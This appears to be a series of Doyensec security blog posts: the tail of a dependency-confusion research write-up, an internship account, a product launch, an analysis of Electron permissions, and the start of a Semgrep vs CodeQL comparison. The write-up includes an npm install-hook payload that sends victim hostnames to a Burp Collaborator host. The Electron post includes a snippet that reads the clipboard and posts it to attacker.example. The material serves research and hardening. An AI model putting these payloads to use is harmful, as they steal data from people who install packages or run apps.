Simple? Well… almost. NPM also allows scoped package names formatted as follows: @scope-name/package-name. In this case, the package can be a target for Dependency Confusion if an attacker can register a scope with the given name. This can also be verified by querying NPM:

def check_scope_exists(package_name):
    split_package_name = package_name.split('/')
    scope_name = split_package_name[0][1:]
    response = requests.get(NPM_ADDRESS + "~" + scope_name, allow_redirects=False)

    # As with check_package_exists: a 200 means the scope is already registered
    return (response.status_code == 200)

The tool I have built allows the streamlining of this process. A researcher can upload a package.json file to my web application. In the backend, the file is parsed and its dependencies are iterated over. As a result, the researcher receives a clear table with potentially vulnerable packages and the versions for a given project:

Vulnerable packages view

The downside of this method is the fact that it requires enumerating the NPM service, with dozens of HTTP requests per project. In order to ease the strain put on the service, I have decided to implement a local cache. Any package name that has once been identified as existing in the NPM registry is saved in the local database and skipped during consecutive scans. Thanks to that, there is no need to repeatedly query the same packages. After scanning about 50 package.json files scraped from Github, I estimated that the caching decreased the number of required requests by over 40%.

Step 2) Payload generation and upload

Successful exploitation of a Dependency Confusion vulnerability requires a package that will call home after it has been installed by the victim. In the case of NPM, the easiest way to do this is by exploiting install hooks. NPM packages allow hooks that run each time a given package is installed. Such functionality is the perfect place for the payload to be triggered. The package.json template I used looks like the following:

{
  "name": {package_name},
  "version": {package_version},
  "description": "This package is a proof of concept used by Doyensec LLC to conduct research. It has been uploaded for test purposes only. Its only function is to confirm the installation of the package on a victim's machines. The code is not malicious in any way and will be deleted after the research survey has been concluded. Doyensec LLC does not accept any liability for any direct, indirect, or consequential loss or damage arising from the use of, or reliance on, this package.",
  "main": "index.js",
  "author": "Doyensec LLC <[email protected]>",
  "license": "ISC",
  "dependencies": { },
  "scripts": {
    "install": "node extract.js {project_id}"
  }
}

Please note the description that informs users and maintainers about the purpose of the package. It is an attempt to distinguish the package from a malicious one, and it serves to inform both NPM and potential victims about the nature of the operation.

The install hook runs the extract.js file which attempts to extract minimal data about the machine it has been run on:

const https = require('https');
var os = require("os");
var hostname = os.hostname();

const data = new TextEncoder().encode(
  JSON.stringify({
    payload: hostname,
    project_id: process.argv[2]
  })
);

const options = {
  hostname: process.argv[2] + '.' + hostname + '.jylzi8mxby9i6hj8plrj0i6v9mff34.burpcollaborator.net',
  port: 443,
  path: '/',
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Content-Length': data.length
  },
  rejectUnauthorized: false
}

const req = https.request(options, res => {});
req.write(data);
req.end();

I’ve decided to save time on implementing a fake DNS server and use the existing infrastructure provided by Burp Collaborator. The file will use a given project’s ID and victim’s hostname as subdomains and try to send an HTTP request to the Burp Collaborator domain. This way my tool will be able to assign callbacks to proper projects along with the victims’ hostnames.

After the payload generation, the package is published to the public NPM repository using the npm command itself: npm publish.

Step 3) Callback aggregation

The final step in the chain is receiving and aggregating the callbacks. As stated before, I have decided to use a Burp Collaborator infrastructure. To be able to download callbacks to my backend I have implemented a simple Burp Collaborator client in Python:

class BurpCollaboratorClient():

    BURP_DOMAIN = "polling.burpcollaborator.net"

    def __init__(self, colabo_key, colabo_subdomain):
        self.colabo_key = colabo_key
        self.colabo_subdomain = colabo_subdomain

    def poll(self):
        params = {"biid": self.colabo_key}
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"}

        response = requests.get(
            "https://" + self.BURP_DOMAIN + "/burpresults", params=params, headers=headers)#, proxies=PROXIES, verify=False)

        if response.status_code != 200:
            raise Exception("Failed to poll Burp Collaborator")

        result_parsed = json.loads(response.text)
        return result_parsed.get("responses", [])

After polling, the returned callbacks are parsed and assigned to the proper projects. For example, if anyone runs npm install on the example project shown before, it’ll render the following callbacks in the application:

Callbacks

Test run

To validate the effectiveness of Confuser, we decided to test Github’s top 50 ElectronJS applications.

I have extracted a list of Electron Applications from the official ElectronJS repository available here. Then, I used the Github API to sort the repositories by the number of stars. For the top 50, I have scraped the package.json files.

This is the Node script to scrape the files:

for (i = 0; i < 50 && i < repos.length;) {
    let repo = repos[i]
    await octokit
      .request("GET /repos/" + repo.repo + "/commits?per_page=1", {})
      .then((response) => {
        var sha = response.data[0].sha
        return octokit.request("GET /repos/" + repo.repo + "/git/trees/:sha?recursive=1", {
          "sha": sha
        });
      })
      .then((response) => {
        for (file_index in response.data.tree) {
          file = response.data.tree[file_index];
          if (file.path.endsWith("package.json")) {
            return octokit.request("GET /repos/" + repo.repo + "/git/blobs/:sha", {
              "sha": file.sha
            });
          }
        }

        return null;
      })
      .then((response) => {
        if (!response) return null;
        i++;
        var package_json = Buffer.from(response.data.content, 'base64').toString('utf-8');
        repoNameSplit = repo.repo.split('/');
        return fs.writeFileSync("package_jsons/" + repoNameSplit[0]+ '_' + repoNameSplit[1] + ".json", package_json);
      });
  }

The script takes the newest commit from each repo and then recursively searches its file tree for any file named package.json. Such files are downloaded and saved locally.

After downloading those files, I uploaded them to the Confuser tool. This resulted in scanning almost 3k dependency packages. Unfortunately, only one application had some potential targets. As it turned out, it was taken from an archived repository, so despite having a “malicious” package in the NPM repository for over 24h (after which it was removed by NPM), I received no callbacks from the victim. I had received a few callbacks from some machines that seemed to have downloaded the application for analysis. This also highlighted a problem with my payload - getting only the hostname of the victim might not be enough to distinguish an actual victim from false positives. A more accurate payload might involve collecting information such as local paths and local users, which opens up privacy concerns.

Example false positives: False positives

In hindsight, it was a pretty naive approach to scrape package.json files from public repositories. Open source projects most likely use only public dependencies and don’t rely on any private infrastructure. On the last day of my research, I downloaded a few closed-source Electron apps. Unpacking them, I was able to extract the package.json in many cases, but none yielded any interesting results.

Summary

We’re releasing Confuser - a newly created tool to find and test for Dependency Confusion vulnerabilities. It allows scanning package.json files, generating and publishing payloads to the NPM repository, and finally aggregating the callbacks from vulnerable targets.

This research has allowed me to greatly increase my understanding of the nature of this vulnerability and the methods of exploitation. The tool has been sufficiently tested to work well during Doyensec’s engagements. That said, there are still many improvements that can be done in this area:

  • Implement its own DNS server or at least integrate with Burp’s self-hosted Collaborator server instances

  • Add support for other languages and repositories

Additionally, there seems to be several research opportunities in the realm of Dependency Confusion vulnerabilities:

  • It seems promising to expand the research to closed-source ElectronJS applications. While high profile targets like Microsoft will probably have their bases covered in that regard (also because they were targeted by the original research), there might be many more applications that are still vulnerable

  • Researching other dependency management platforms. The original research touches on NPM, Ruby Gems, Python’s PIP, JFrog and Azure Artifacts. It is very likely that similar problems exist in other environments

My Internship Experience at Doyensec

23 August 2022 at 22:00

Throughout the Summer of 2022, I worked as an intern for Doyensec. I’ll be describing my experience with Doyensec in this blog post so that other potential interns can decide if they would be interested in applying.

The Recruitment Process

The recruitment process began with a non-technical call about the internship to make introductions and exchange more information. Once everyone agreed it was a fit, we scheduled a technical challenge where I was given two hours to provide my responses. I enjoyed the challenge and did not find it to be a waste of time. After the technical challenge, I had two technical interviews with different people (Tony and John). I thought these went really well for questions about web security, but I didn’t know the answers to some questions about other areas of application security I was less familiar with. Since Doyensec performs assessments of non-web applications as well (mobile, desktop, etc.), it made sense that they would ask some questions about non-web topics. After the final call, I was provided with an offer via email.

The Work

As an intern, my time was divided between working on an internal training presentation, conducting research, and performing security assessments. Creating the training presentation allowed me to learn more about a technical topic that will probably be useful for me in the future, whether at Doyensec or not. I used some of my research time to learn about the topic and make the presentation. My presentation was on the advanced features of Semgrep, the open-source static code analysis tool. Doyensec often has cross-training sessions where members of the team demonstrate new tools and techniques, or just the latest “Best Bug” they found on an engagement.

Conducting research was a good experience as an intern because it allowed me to learn more about the research topic, which in my case was Electron and its implementation of web API permissions. Don’t worry too much about not having a good research topic of your own already – there are plenty of things that have already been selected as options, and you can ask for help choosing a topic if you’re not sure what to research. My research topic was originally someone else’s idea.

My favorite part of the internship was helping with security assessments. I was able to work as a normal consultant with some extra guidance. I learned a lot about different web frameworks and programming languages. I was able to see what technologies real companies are using and review real source code. For example, before the internship, I had very limited experience with applications written in Go, but now I feel mostly comfortable testing Go web applications. I also learned more about mobile applications, which I had limited experience with. In addition to learning, I was able to provide actionable findings to businesses to help reduce their risk. I found vulnerabilities of all severities and wrote reports for these with recommended remediation steps.

Should You Become an Intern?

When I was looking for an internship, I wanted to find a role that would let me learn a lot. Most of the other factors were low-priority for me because the role is temporary. If you really enjoy application security and want to learn more about it, this internship is a great way to do that. The people at Doyensec are very knowledgeable about a wide variety of application security topics, and are happy to share their knowledge with an intern.

Even though my priority was learning, it was also nice that the work is performed remotely and with flexible hours. I found that some days I preferred to stop work at around 2-3 PM and then continue in the night. I think these conditions are desirable to anyone, not just interns.

As for qualifications, Doyensec has stated that the ideal candidate:

  • Already has some experience with manual source code review and Burp Suite / OWASP ZAP
  • Learns quickly
  • Should be able to prepare reports in English
  • Is self-organized
  • Is able to learn from his/her mistakes
  • Has motivation to work/study and show initiative
  • Must be communicative (without this it is difficult to teach effectively)
  • Brings something to the mix (e.g., creativity, academic knowledge, etc.)

My experience before the internship consisted mostly of bug bounty hunting and CTFs. There are not many other opportunities for college students with zero experience, so I had spent nearly two years bug hunting part-time before the internship. I also had the OSWE certification to demonstrate capability for source code review, but this is definitely not required (they’ll test you anyway!). Simply being an active participant in CTFs with a focus on web security and code review may be enough experience. You may also have some other way of learning about web security if you don’t usually participate in CTFs.

Final Thoughts

I enjoyed my internship at Doyensec. There was a good balance between learning and responsibility that has prepared me to work in an application security role at Doyensec or elsewhere.

If you’re interested in the role and think you’d make a good fit, apply via our careers page: https://www.careers-page.com/doyensec-llc. We’re now accepting candidates for the Fall Internship 2022.

ElectroNG, our premium SAST tool released!

5 September 2022 at 22:00

As promised in November 2021 at Hack In The Box #CyberWeek event in Abu Dhabi, we’re excited to announce that ElectroNG is now available for purchase at https://get-electrong.com/.

ElectroNG UI

Our premium SAST tool for Electron applications is the result of many years of applied R&D! Doyensec has been the leader in Electron security since being the first security company to publish a comprehensive security overview of the Electron framework during BlackHat USA 2017. Since then, we have reported dozens of vulnerabilities in the framework itself and popular Electron-based applications.

A bit of history

We launched Electronegativity OSS at the beginning of 2019 as a set of scripts to aid the manual auditing of Electron apps. Since then, we’ve released numerous updates, educated developers on security best practices, and grown a strong community around Electron application security. Electronegativity is even mentioned in the official security documentation of the framework.

At the same time, Electron has established itself as the framework of choice for developing multi-OS desktop applications. It is now used by over a thousand public desktop applications and many more internal tools and custom utilities. Major tech companies are betting on this technology by devoting significant resources to it, and it is now evident that Electron is here to stay.

What’s new?

Considering the evolution of the framework and emerging threats, we quickly realized that Electronegativity needed a significant refresh, in terms of detection and features, to be able to help modern companies in “building with security”.

At the end of 2020, we sat down to create a project roadmap and created a development team to work on what is now ElectroNG. In this blog post, we will highlight some of the major improvements over the OSS version. There is much more under the hood, and we will be covering more features in future posts and presentations.

ElectroNG UI

User Interface

If you’ve ever used Electronegativity, it would be obvious that ElectroNG is no longer a command-line tool. Instead, we’ve built a modern desktop app (using Electron!).


Better Detection, More Checks

ElectroNG features a new decision mechanism to flag security issues based on improved HTML/JavaScript/Typescript parsing and new heuristics. After developing that, we improved all existing atomic and conditional checks to reduce the number of false positives and improve accuracy. There are now over 50 checks to detect misconfigurations and security vulnerabilities!

However, the most significant improvement revolves around the creation of Electron-dependent checks. ElectroNG will attempt to determine the specific version of the framework in use by the application and dynamically adjust the scan results based on that. Considering that Electron APIs and options change very frequently, this boosts the tool’s reliability in determining things that matter.

To provide a concrete example to the reader, let’s consider a lesser-known setting named affinity. Electron v2 introduced a new BrowserView/BrowserWindow webPreferences option for gathering several windows into a single process. When specified, web pages loaded by BrowserView/BrowserWindow instances with the same affinity will run in the same renderer process. While this setting was meant to improve performance, it leads to unexpected results across different Electron versions.

Let’s consider the following code snippet:

function createWindow () {
  // Create the browser window.
  firstWin = new BrowserWindow({
    width: 800,
    height: 600,
    webPreferences: {
      nodeIntegration: true,
      affinity: "secPrefs"
    }
  })

  secondWin = new BrowserWindow({
    width: 800,
    height: 600,
    webPreferences: {
      nodeIntegration: false,
      affinity: "secPrefs"
    }
  })

  firstWin.loadFile('index.html')
  secondWin.loadFile('index.html')
}

Looking at the nodeIntegration setting defined by the two webPreferences definitions, one might expect the first BrowserWindow to have access to Node.js primitives and the second one to be isolated. This is not always the case, and this inconsistency might leave an insecure BrowserWindow open to attackers.

The results across different Electron versions are surprising to say the least:

Affinity Diff By Versions

The affinity option has been fully deprecated in v14 as part of the Electron maintainers’ plan to more closely align with Chromium’s process model for security, performance, and maintainability. This example demonstrates two important things around renderers’ settings:

  • The specific Electron in use determines which webPreferences are applicable and which aren’t
  • The semantic and security implications of some webPreferences change based on the specific version of the framework

Terms and Price

ElectroNG is available for online purchase at $688/year per user. Visit https://get-electrong.com/buy.html.

The license does not limit the number of projects, scans, or even installations as long as the software is installed on machines owned by a single individual. If you’re a consultant, you can run ElectroNG for any number of applications, as long as you are running it and not your colleagues or clients. For bulk orders (over 50 licenses), contact us!

Electronegativity & ElectroNG

With the advent of ElectroNG, we have already received emails asking about the future of Electronegativity.

Electronegativity & ElectroNG will coexist. Doyensec will continue to support the OSS project as we have done for the past years. As usual, we look forward to external contributions in the form of pull requests, issues, and documentation.

ElectroNG’s development focus will be on features that are important for paid customers, with the ultimate goal of providing an effective and easy-to-use security scanner for Electron apps. Having a team behind this new project will also bring innovation to Electronegativity, since bug fixes and features that are applicable to the OSS version will also be ported.

As successfully done in the past by other projects, we hope that the coexistence of a free community and paid versions of the tool will give users the flexibility to pick whatever fits best. Whether you’re an individual developer, a small consulting boutique, or a big enterprise, we believe that Electronegativity & ElectroNG can help eradicate security vulnerabilities from your Electron-based applications.

Diving Into Electron Web API Permissions

26 September 2022 at 22:00

Introduction

When a Chrome user opens a site on the Internet that requests a permission, Chrome displays a large prompt in the top left corner. The prompt remains visible on the page until the user interacts with it, reloads the page, or navigates away. The permission prompt has Block and Allow buttons, and an option to close it. On top of this, Chrome 98 displays the full prompt only if the permission was triggered “through a user gesture when interacting with the site itself”. These precautionary measures are the only things preventing a malicious site from using APIs that could affect user privacy or security.

Chrome Permission Prompt

Since Chrome implements this pop-up box, how does Electron handle permissions? From Electron’s documentation:

“In Electron the permission API is based on Chromium and implements the same types of permissions. By default, Electron will automatically approve all permission requests unless the developer has manually configured a custom handler. While a solid default, security-conscious developers might want to assume the very opposite.”

This approval can lead to serious security and privacy consequences if the renderer process of the Electron application were to be compromised via unsafe navigation (e.g., open redirect, clicking links) or cross-site scripting. We decided to investigate how Electron implements various permission checks to compare Electron’s behavior to that of Chrome and determine how a compromised renderer process may be able to abuse web APIs.

Webcam, Microphone, and Screen Recording Permissions

The webcam, microphone, and screen recording functionalities present a serious risk to users when approval is granted by default. Without implementing a permission handler, an Electron app’s renderer process will have access to a user’s webcam and microphone. However, screen recording requires the Electron app to have configured a source via a desktopCapturer in the main process. This leaves little room for exploitability from the renderer process, unless the application already needs to record a user’s screen.

Electron groups these three into one permission, “media”. In Chrome, these permissions are separate. Electron’s lack of separation between these three is problematic because there may be cases where an application only requires the microphone, for example, but must also be granted access to record video. By default, the application would not have the capability to deny access to video without also denying access to audio. For those wondering, modern Electron apps that seemingly handle microphone & video permissions separately are only tracking and respecting the user choices in their UI. An attacker with a compromised renderer could still access any media.

It is also possible for media devices to be enumerated even when permission has not been granted. In Chrome however, an origin can only see devices that it has permission to use. The API navigator.mediaDevices.enumerateDevices() will return all of the user’s media devices, which can be used to fingerprint the user’s devices. For example, we can see a label of “Default - MacBook Pro Microphone (Built-in)”, despite having a deny-all permission handler.

navigator.mediaDevices.enumerateDevices()
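
For reference, this is all it takes from the renderer (standard Web API, nothing Electron-specific):

// Renderer process: lists every media device, label included,
// even when a deny-all permission handler is installed
navigator.mediaDevices.enumerateDevices().then((devices) => {
  devices.forEach((d) => console.log(d.kind, d.label, d.deviceId));
});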

To deny access to all media devices (but not prevent enumerating the devices), a permission handler must be implemented in the main process that rejects requests for the “media” permission.
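
A minimal sketch of such a handler in the main process (deny-by-default for every other permission is covered in the hardening section at the end of this post):

const { session } = require('electron');

session.defaultSession.setPermissionRequestHandler((webContents, permission, callback) => {
  if (permission === 'media') {
    // Covers webcam, microphone and screen-capture requests alike
    return callback(false);
  }
  // Other permissions: deny by default too (see the hardening section below)
  callback(false);
});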

File System Access API

The File System Access API normally allows access to read and write local files. In Electron, reading files has been implemented, but writing to files has not, and permission to write to files is always denied. However, access to read files is always granted when a user selects a file or directory. In Chrome, when a user selects a file or directory, Chrome notifies you that you are granting access to a specific file or directory until all tabs of that site are closed. In addition, Chrome prevents access to directories or files that are deemed too sensitive to disclose to a site. These are both considerations mentioned in the API’s standard (discussed by the WICG).

  • “User agents should try to make sure that users are aware of what exactly they’re giving websites access to” – implemented in Chrome with the notification after choosing a file or directory
Chrome's prompt: Let site view files?
  • “User agents are encouraged to restrict which directories a user is allowed to select in a directory picker, and potentially even restrict which files the user is allowed to select” – implemented in Chrome by preventing users from sharing certain directories containing system files. In Electron, there is no such notification or prevention: a user is allowed to select their root directory or any other sensitive directory, potentially granting more access than intended to a website, and no notification alerts the user to the level of access they are granting (see the sketch below).
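
A minimal renderer-side sketch of that read path (the function name is illustrative; it assumes it runs in response to some user action that opens the picker):

// Renderer process: once the user picks a file, read access is granted
// with no scope warning or sensitive-directory check
async function readPickedFile() {
  const [handle] = await window.showOpenFilePicker();
  const file = await handle.getFile();
  console.log(await file.text());
}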

Clipboard, Notification, and Idle Detection APIs

For these three APIs, the renderer process is granted access by default. This means a compromised renderer process can read the clipboard, send desktop notifications, and detect when a user is idle.

Clipboard

Access to the user’s clipboard is extremely security-relevant because some users will copy passwords or other sensitive information to the clipboard. Normally, Chromium denies access to reading the clipboard unless it was triggered by a user’s action. However, we found that adding an event handler for the window’s load event would allow us to read the clipboard without user interaction.

Clipboard Reading Callback
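
A minimal sketch of that technique from a compromised renderer (the exfiltration endpoint is a placeholder):

// Renderer process: read the clipboard as soon as the page loads,
// without any user gesture
window.addEventListener('load', async () => {
  const contents = await navigator.clipboard.readText();
  fetch('https://attacker.example/exfil', { method: 'POST', body: contents });
});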

To deny access to this API, deny access to the “clipboard-read” permission.

Notifications

Sending desktop notifications is another security-relevant feature because desktop notifications can be used to increase the success rate of phishing or other social engineering attempts.

PoC for Notification API Attack
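
A minimal renderer-side sketch (the wording is purely illustrative):

// Renderer process: desktop notification that lends credibility to a phishing attempt
new Notification('Company IT Support', {
  body: 'Your session has expired. Please sign in again.'
});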

To deny access to this API, deny access to the “notifications” permission.

Idle Detection

The Idle Detection API is much less security-relevant, but its abuse still represents a violation of user privacy.

Idle Detection API abuse
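
A minimal renderer-side sketch (using a 60-second threshold):

// Renderer process: observe when the user goes idle or locks the screen
const detector = new IdleDetector();
detector.addEventListener('change', () => {
  console.log(detector.userState, detector.screenState);
});
detector.start({ threshold: 60000 });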

To deny access to this API, deny access to the “idle-detection” permission.

Local Font Access API

For this API, the renderer process is granted access by default. Furthermore, the main process never receives a permission request. This means that a compromised renderer process can always read a user’s fonts. This behavior has significant privacy implications because the user’s local fonts can be used as a fingerprint for tracking purposes and they may even reveal that a user works for a specific company or organization. Yes, we do use custom fonts for our reports!

Local Font Access API abuse
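
A minimal renderer-side sketch of that fingerprinting via the standard queryLocalFonts() entry point:

// Renderer process: enumerate locally installed fonts without any prompt
window.queryLocalFonts().then((fonts) => {
  fonts.forEach((f) => console.log(f.family, f.fullName));
});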

Security Hardening for Electron App Permissions

What can you do to reduce your Electron application’s risk? You can quickly assess if you are mitigating these issues and the effectiveness of your current mitigations using ElectroNG, the first SAST tool capable of rapid vulnerability detection and identifying missing hardening configurations. Among its many features, ElectroNG features a dedicated check designed to identify if your application is secure from permission-related abuses:

ElectroNG Permission Check

A secure application will usually deny all the permissions for dangerous web APIs by default. This can be achieved by adding a permission handler to a Session as follows:

  ses.setPermissionRequestHandler((webContents, permission, callback) => {
    return callback(false);
  })

If your application needs to allow the renderer process permission to access some web APIs, you can add exceptions by modifying the permission handler. We recommend checking if the origin requesting permission matches an expected origin. It’s a good practice to also set the permission request handler to null first to force any permission to be requested again. Without this, revoked permissions might still be available if they’ve already been used successfully.

session.defaultSession.setPermissionRequestHandler(null);
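
Putting those recommendations together, a sketch of an origin-aware handler could look like the following (the origin and the allowed permission list are placeholders):

const { session } = require('electron');

// Clear any previously granted permissions, then install an origin-aware handler
session.defaultSession.setPermissionRequestHandler(null);
session.defaultSession.setPermissionRequestHandler((webContents, permission, callback) => {
  const origin = new URL(webContents.getURL()).origin;
  const allowed = origin === 'https://app.example.com' && ['notifications'].includes(permission);
  callback(allowed);
});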

Conclusions

As we discussed, these permissions present significant risk to users even in Electron applications setting the most restrictive webPreferences settings. Because of this, it’s important for security teams & developers to strictly manage the permissions that Electron will automatically approve unless the developer has manually configured a custom handler.

Comparing Semgrep and CodeQL

5 October 2022 at 22:00

Introduction

Recently, a client of ours asked us to put R2c’s Semgrep in a head-to-head test with GitHub’s CodeQL. Semgrep is open source and free (with premium options). CodeQL “is free for research and open source” projects and accepts open source contributions to its libraries and queries, but is not free for most companies. Many of our engineers had already been using Semgrep frequently, so we were reasonably familiar with it. On the other hand, CodeQL hadn’t gained much traction for our internal purposes given the strict licensing around consulting. That said, our client’s use case is not the same as ours, so what works for us, may not work well for them. We have decided to share our results here.

SAST background

A SAST tool generally consists of a few components: 1) a lexer/parser to make sense of the language, 2) rules which process the output produced by the lexer/parser to find vulnerabilities, and 3) tools to manage the output from the rules (tracking/ticketing, vulnerability classification, explanation text, prioritization, scheduling, third-party integrations, etc.).

Difficulties in evaluating SAST tools

The rules are usually the source of most SAST complaints because ultimately, we all hope ideally that the tool produces perfect results, but that’s unrealistic. On one hand, you might get a tool that doesn’t find the bug you know is in the code (a false negative - FN) or on the other, it might return a bunch of useless supposed findings that are either lacking any real impact or potentially just plain wrong (a false positive - FP). This leads to our first issue when attempting to quantitatively measure how good a SAST tool is - what defines true/false or positives/negatives?

Some engineers might say a true positive is a demonstrably exploitable condition, while others would say matching the vulnerable pattern is all that matters, regardless of the broader context. Things are even more complicated for applications that incorporate vulnerable code patterns by design. For example, consider systems administration applications which execute shell commands via parameters passed in a web request. In most environments, this is the worst possible scenario. However, for these types of apps, it’s their primary purpose. In those cases, engineers are left with the subjective question of whether to classify a finding as a true or false positive when an application’s users can execute arbitrary code in the application, but only after being fully and properly authenticated and authorized to do so.

These types of issues come from asking too much of the SAST application and we should focus on locating vulnerable code patterns - leaving it to people to vet and sort the findings. This is one of the places where the third set of components comes into play and can be a real differentiator between SAST applications. How users can ignore the same finding class(es), findings on the same code, findings on certain paths, or conditionally ignoring things, becomes very important to filter the signal from the noise. Typically, these tools become more useful for organizations that are willing to commit the time to configure the scans properly and refine the results, rather than spending it triaging a bunch of issues they didn’t want to see in the first place and becoming frustrated.

Furthermore, quantitative comparisons between tools can be problematic for several reasons. For example, if tool A finds numerous low severity bugs, but misses a high severity one, while tool B finds only a high severity bug, but misses all the low severity ones, which is a better tool? Numerically, tool A would score better, but most organizations would rather find the higher severity vulnerability. If tool A finds one high severity vulnerability and B finds a different one, but not the one A finds, what does it mean? Some of these questions can be handled with statistical methods, but most people don’t usually take this approach. Additionally, issues can come up when you’re in a multi-language environment where a tool works great on one language and not so great on the others. Yet another twist might be a tool missing a vulnerability due to a parsing error that would certainly be fixed in a later release, rather than due to a rule-matching issue specifically.

These types of concerns don’t necessarily have easy answers and it’s important to remember that any evaluation of a SAST tool is subject to variations based on the language(s) being examined, which rules are configured to run, the code repository’s structure and contents, and any customizations applied to the rules or tool configuration.

Another hurdle in properly evaluating a SAST tool is finding a body of code on which to test it. If the objective is to simply scan the code and verify whether the findings are true positives (TP) or false positives (FP), virtually any supported code could work, but finding true negatives (TN) and false negatives (FN) require prior knowledge of the security state of the code or having the code manually reviewed.

This then raises the question of how to quantify the negatives that a SAST tool can realistically discover. Broadly, a true positive is either a connection of a source to an unprotected sink or possibly a stand-alone configuration (e.g., disabling a security feature). So how do we count true negatives specifically? Do we count the total number of sources that lead to a protected sink, the total of protected sinks, the total safe function calls (regardless of whether they are identified sinks), and all the safe configuration options? Of course, if the objective is solely to verify the relative quality of detection between competing software, simply comparing the results, provided all things were reasonably equal, can be sufficient.

Semgrep VS CodeQL

Our testing methodology

We utilized the OWASP Benchmark Project to analyze pre-classified Java application code to provide a more accurate head-to-head comparison of Semgrep vs. CodeQL. While we encountered a few bugs running the tools, we were able to work around them and produce a working test and meaningful results.

Both CodeQL and Semgrep came with sample code used to demonstrate the tool’s capabilities. We used the test suite of sample vulnerabilities from each tool to test the other, swapping the tested files “cross-tool”. This was done with the assumption that the test suite for each tool should return 100% accurate results for the original tool, by design, but not necessarily for the other. Some modifications and omissions were necessary however, due to the organization and structure of the test files.

We also ran the tools against a version of our client’s code in the manner that required the least amount of configuration and/or knowledge of the tools. This was intended to show what you get “out of the box” for each tool. We iterated over several configurations of the tools and their rules, until we came to a meaningful, yet manageable set of results (due to time constraints).

Assigning importance

When comparing SAST tools, based on past experience, we feel these criteria are important aspects that need to be examined.

  • Language and framework support
  • Lexer/Parser functionality
  • Pre/post scan options (exclusions, disabling checks, filtering, etc.)
  • Rules
  • Findings workflows (internal tracking, ticket system integration, etc.)
  • Scan times

Language and framework support

The images below outline the supported languages for each tool, refer to the source links for additional information about the supported frameworks:

Semgrep:
Semgrep results

Source: https://semgrep.dev/docs/supported-languages/

CodeQL:
CodeQL results

Source: https://codeql.github.com/docs/codeql-overview/supported-languages-and-frameworks/

Not surprisingly, we see support for many of the most popular languages in both tools, but a larger number, both in GA and under development in Semgrep. Generally speaking, this gives an edge to Semgrep, but practically speaking, most organizations only care if it supports the language(s) they need to scan.

Lexer/Parser functionality

Lexer/parser performance will vary based on the language and framework, their versions and code complexity. It is only possible to get a general sense of this by scanning numerous repositories and monitoring for errors or examining the source of the parser and tool.

During testing on various applications, both tools encountered errors allowing only the partial parsing of many files. The thoroughness of the parsing results varied depending on the tool and on the code being analyzed. Testing our client’s Golang project, we did occasionally encounter parsing errors with both as well.

Semgrep:

We encountered an issue when testing against third-party code where a custom function named exit() was declared and used. Since that identifier is reserved, the parser failed with an invalid syntax error once the function was reached. Two things are notable here: the code should theoretically not work properly in the first place, and despite this, Semgrep was still able to perform a partial examination. Semgrep excelled at handling incomplete code or code with errors, as it generally operates on a single-file scope.

CodeQL:

CodeQL works a bit differently, in that it effectively creates a database from the code, allowing you to then write queries against that database to locate vulnerabilities. In order for it to do this, it requires a fully buildable application. This inherently means that it must be more strict with its ability to parse all the code.

In our testing, CodeQL generated errors on the majority of files that it had findings for (partial parsing at best), and almost none were analyzed without errors. Roughly 85% of files generated some errors during database creation.

According to CodeQL, a small number of extraction errors is normal, but a large number is not. It was unclear how to reduce the large number of extraction errors. According to CodeQL’s documentation, the only ways were to wait for CodeQL to release a fixed version of the extractor or to debug using the logs. We attempted to debug with the logs, but the error messages were not completely clear and it seemed that the two most common errors were related to the package names declared at the top of the files and variables being re-declared. It was not completely clear if these errors were due to an overly strict extractor or if the code being tested was incomplete.

Semgrep would seem to have the advantage here, but it’s not a completely fair comparison, due to the different modes of operation.

Pre/post scan options

Semgrep:

Among the options you can select when firing up a Semgrep scan are:

  • Choosing which rules, or groups of rules, to run, or allowing automatic selection
    • Semgrep registry rules (remote community and r2c created; currently 973 rules)
    • Local custom rules and/or “ephemeral” rules passed as an argument on the command line
    • A combination of the above
  • Choosing which languages to examine
  • A robust set of filtering options to include/exclude files, directories and specific content
  • Ability to configure a comparison baseline (find things not already in commit X)
  • Whether to continue if errors or vulnerabilities are encountered
  • Whether to automatically perform fixes by replacing text and whether to perform dry runs to check before actually changing
  • The maximum size of the files to scan
  • Output formats

Notes:

  1. While the tool does provide an automated scanning option, we found situations in which --config auto did not find all the vulnerabilities that manually selecting the language did.

  2. The re-use/tracking of the scan results requires using Semgrep CI or Semgrep App.

CodeQL:

CodeQL requires a buildable application (i.e., no processing of a limited set of files), with a completely different concept of “scanning”, so this notion doesn’t directly translate. In effect, you create a database from the code, which you subsequently query to find bugs, so much of the “filtering” can be accomplished by modifying the queries that are run.

Options include:

  • Specifying which language(s) to process
    • The CodeQL repository contains libraries and specific queries for each language
    • The Security folder contains (21) queries for various CWEs
  • Which queries to run
  • Location of the files
  • When the queries are run on the resulting database you can specify the output format
  • Adjustable verbosity when creating the database(s)

Because CodeQL creates a searchable database, you can indefinitely run queries against the scanned version of the code.

Because of the different approaches it is difficult to say one tool has an advantage over the other. The most significant difference is probably that Semgrep allows you to automatically fix vulnerabilities.

Rules

As mentioned previously, these tools take completely different approaches (i.e., rules vs queries). Whether someone prefers writing queries vs. YAML is subjective, so we’ll not discuss the formats themselves specifically.

Semgrep:

As primarily a string-matching static code analysis tool, Semgrep’s accuracy is mostly driven by the rules in use and their modes of operation. Semgrep is probably best thought of as an improvement on the Linux command line tool grep. It adds improved ease of use, multi-line support, metavariables and taint tracking, as well as other features that grep directly does not support. Beta features also include the ability to track across related files.

Semgrep rules are defined in relatively simple YAML files with only a handful of elements used to create them. This allows someone to become reasonably proficient with the tool in a matter of hours, after reading the documentation and tutorials. At times, the tool’s less than full comprehension of the code can cause rule writing to be more difficult than it might appear at first glance.

In Semgrep, there are several ways to execute rules, either locally or remotely. Additionally, you can pass them as command line arguments referred to as “ephemeral” rules, eliminating the YAML files altogether.

The rule below shows an example of a reasonably straightforward rule. It effectively looks for an insecure comparison of something that might be a secret within an HTTP request.

rules:
  - id: insecure-comparison-taint
    message: >-
      User input appears to be compared in an insecure manner that allows for side-channel timing attacks. 
    severity: ERROR
    languages: [go]
    metadata:
      category: security
    mode: taint
    pattern-sources:
      - pattern-either:
          - pattern: "($ANY : *http.Request)"
          - pattern: "($ANY : http.Request)"
    pattern-sinks:
      - patterns:
          - pattern-either: 
            - pattern: "... == $SECRET"
            - pattern: "... != $SECRET"
            - pattern: "$SECRET == ..."
            - pattern: "$SECRET != ..."
